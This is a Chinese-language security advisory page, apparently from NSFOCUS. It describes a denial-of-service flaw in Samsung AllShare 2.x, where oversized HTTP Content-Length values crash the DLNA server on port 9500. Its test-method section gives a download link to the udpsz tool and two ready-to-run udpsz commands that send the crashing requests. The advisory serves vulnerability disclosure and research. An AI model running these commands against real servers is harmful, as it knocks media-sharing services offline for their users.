首页 -> 安全研究

安全研究

安全漏洞
Samsung AllShare HTTP标头处理拒绝服务漏洞

发布日期:2012-06-19
更新日期:2012-06-19

受影响系统:
Samsung AllShare 2.x
描述:
AllShare软件可使PC运行许多AllShare服务,通过本地网络回放流可在PC和其他设备之间共享视频、图片和音乐。

Samsung AllShare在处理HTTP标头时,libpin3_dll.dll模块中存在空指针引用错误,如果"Content-Length"值是介于4294967262和4294967293之间,会在MSVCR90.calloc中造成意外。本地攻击者通过在"Content-Length"标头中包含较大的值并发送到TCP端口9500,可利用此漏洞造成DLNA服务器的拒绝服务。该漏洞位于lupin3 (libpin3)库内。

<*来源:Luigi Auriemma (aluigi@pivx.com
  
  链接:http://secunia.com/advisories/49209/
        http://aluigi.altervista.org/adv/allshare_1-adv.txt
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http://aluigi.org/testz/udpsz.zip

  udpsz -c "POST /DocumentViewer/Control/blah HTTP/1.1\r\nCONTENT-LENGTH: 2147483647\r\n\r\n" -T SERVER 9500 -1
or
  udpsz -c "POST /DocumentViewer/Control/blah HTTP/1.1\r\nCONTENT-LENGTH: 4294967293\r\n\r\n" -T SERVER 9500 -1

建议:
厂商补丁:

Samsung
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.samsung.com/

浏览次数:2648
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障